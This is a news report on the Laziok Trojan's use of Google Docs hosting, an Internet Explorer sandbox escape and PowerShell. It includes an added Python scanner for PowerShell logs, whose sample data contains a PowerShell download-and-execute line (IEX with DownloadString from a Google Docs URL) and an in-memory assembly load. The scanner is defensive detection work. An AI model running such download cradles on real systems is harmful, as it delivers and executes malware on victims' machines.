By taking advantage of Google Docs and PowerShell, a Trojan called Laziok is looking to gather and steal more information, researchers said.
Laziok was first discovered last year, when attackers used the malware against energy companies in the Middle East. Attackers exploited an old Windows vulnerability to drop the Trojan onto users’ systems.
Attackers found a way to bypass Google’s security checks and uploaded the malicious payload to Google Docs, researchers at FireEye said. The malware was uploaded in March and remained there until FireEye notified Google.
“Users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning,” researchers said in a blog post. “After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.”
When users accessed the attack page from Internet Explorer, the malicious script kicked in and allowed attackers to use an exploitation method known as “Godmode,” which allows code written in VBScript to break the browser sandbox.
The malicious script then leveraged PowerShell to download the actual malware from Google Docs and execute it.
“PowerShell is also useful for bypassing antivirus software because it is able to inject payloads directly in memory,” FireEye researchers said in the blog.
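The combination described above, PowerShell pulling a payload from Google Docs and running it without writing an executable to disk, leaves a recognisable trace in PowerShell script-block logs. The scanner below is an added defender-side example, not code from FireEye's post; the log lines it parses are constructed, and the simplified "timestamp ScriptBlock: text" format is an assumption rather than the exact Windows event layout.

```python
import re
from dataclasses import dataclass

# Constructed sample script-block log text (not real captures).
SAMPLE_LOG = """\
2016-03-01T10:00:01 ScriptBlock: Get-ChildItem C:\\Users\\alice\\Documents
2016-03-01T10:00:05 ScriptBlock: IEX (New-Object Net.WebClient).DownloadString('https://docs.google.com/uc?id=REDACTED')
2016-03-01T10:00:09 ScriptBlock: [System.Reflection.Assembly]::Load($bytes) | Out-Null
2016-03-01T10:00:12 ScriptBlock: Invoke-WebRequest https://docs.google.com/document/d/REDACTED -OutFile report.pdf
2016-03-01T10:00:15 ScriptBlock: Write-Host 'done'
"""

# Hosting service the article says was abused as a payload store.
DOCS_HOSTS = re.compile(r"https?://(docs|drive)\.google\.com/", re.I)
# Download cradles: remote content pulled into the PowerShell session.
DOWNLOAD = re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|Invoke-RestMethod", re.I)
# In-memory execution: the payload is run or loaded without a file on disk.
IN_MEMORY = re.compile(r"\bIEX\b|Invoke-Expression|Reflection\.Assembly\]::Load|FromBase64String", re.I)

@dataclass
class Finding:
    timestamp: str
    severity: str      # "high" when fetch-from-Docs and in-memory execution coincide
    reasons: list
    script: str

def scan_script_blocks(log_text: str) -> list:
    """Flag script blocks that fetch from Google Docs and/or execute in memory.
    Both indicators in one block is rated high; either alone is medium."""
    findings = []
    for line in log_text.splitlines():
        m = re.match(r"(\S+) ScriptBlock: (.*)", line)
        if not m:
            continue
        ts, script = m.groups()
        reasons = []
        if DOCS_HOSTS.search(script) and DOWNLOAD.search(script):
            reasons.append("download-from-google-docs")
        if IN_MEMORY.search(script):
            reasons.append("in-memory-execution")
        if reasons:
            severity = "high" if len(reasons) == 2 else "medium"
            findings.append(Finding(ts, severity, reasons, script))
    return findings

if __name__ == "__main__":
    for f in scan_script_blocks(SAMPLE_LOG):
        print(f.timestamp, f.severity, ",".join(f.reasons), "|", f.script)
```

The medium-severity hits (a plain Docs download to a file, or a reflective load on its own) are worth correlating with the parent process and the network destination before treating them as incidents.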
Once it infects a device, Trojan.Laziok collects information about the system, including a list of installed antiviruses.